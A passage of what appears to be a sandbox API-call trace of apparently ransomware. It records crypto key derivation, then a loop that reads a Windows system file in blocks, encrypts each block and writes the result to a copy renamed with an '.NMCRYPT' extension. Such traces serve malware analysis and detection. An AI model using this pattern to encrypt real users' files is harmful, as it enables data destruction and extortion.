dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.155] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.155] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.155] CryptCreateHash (in: hProv=0x8e3770, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0160.156] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.156] CryptDeriveKey (in: hProv=0x8e3770, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad638) returned 1 [0160.156] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0160.156] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0160.156] wcslen (_String="\\\\?\\") returned 0x4 [0160.156] CryptDuplicateKey (in: hKey=0x9ad638, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad1f8) returned 1 [0160.156] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0160.157] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0160.157] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0160.157] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0160.158] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.159] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.159] GetLastError () returned 0x0 [0160.159] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.522] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.522] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.522] GetLastError () returned 0x0 [0160.522] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.523] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.523] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.523] GetLastError () returned 0x0 [0160.523] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.523] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.523] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.523] GetLastError () returned 0x0 [0160.523] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.523] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.523] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.523] GetLastError () returned 0x0 [0160.524] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.524] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.524] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.524] GetLastError () returned 0x0 [0160.524] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.524] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.524] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.524] GetLastError () returned 0x0 [0160.524] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.524] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.524] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.524] GetLastError () returned 0x0 [0160.524] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.524] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.524] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.525] GetLastError () returned 0x0 [0160.525] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.525] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.525] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.525] GetLastError () returned 0x0 [0160.525] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.525] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.525] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.525] GetLastError () returned 0x0 [0160.525] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.525] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.525] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.525] GetLastError () returned 0x0 [0160.525] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.525] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.525] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.525] GetLastError () returned 0x0 [0160.525] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.525] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.525] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.525] GetLastError () returned 0x0 [0160.525] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.525] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.526] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.526] GetLastError () returned 0x0 [0160.526] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.526] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.526] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.526] GetLastError () returned 0x0 [0160.526] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.526] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.526] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.526] GetLastError () returned 0x0 [0160.526] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.526] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.526] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.526] GetLastError () returned 0x0 [0160.526] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.526] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.526] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.527] GetLastError () returned 0x0 [0160.527] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.527] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.527] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.527] GetLastError () returned 0x0 [0160.527] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.527] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.527] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.527] GetLastError () returned 0x0 [0160.527] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.527] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.527] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.527] GetLastError () returned 0x0 [0160.527] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.527] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.527] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.527] GetLastError () returned 0x0 [0160.527] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.527] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.527] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.527] GetLastError () returned 0x0 [0160.527] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.527] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.528] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.528] GetLastError () returned 0x0 [0160.528] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.528] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.528] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.528] GetLastError () returned 0x0 [0160.528] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.528] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.528] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.528] GetLastError () returned 0x0 [0160.528] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.528] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, 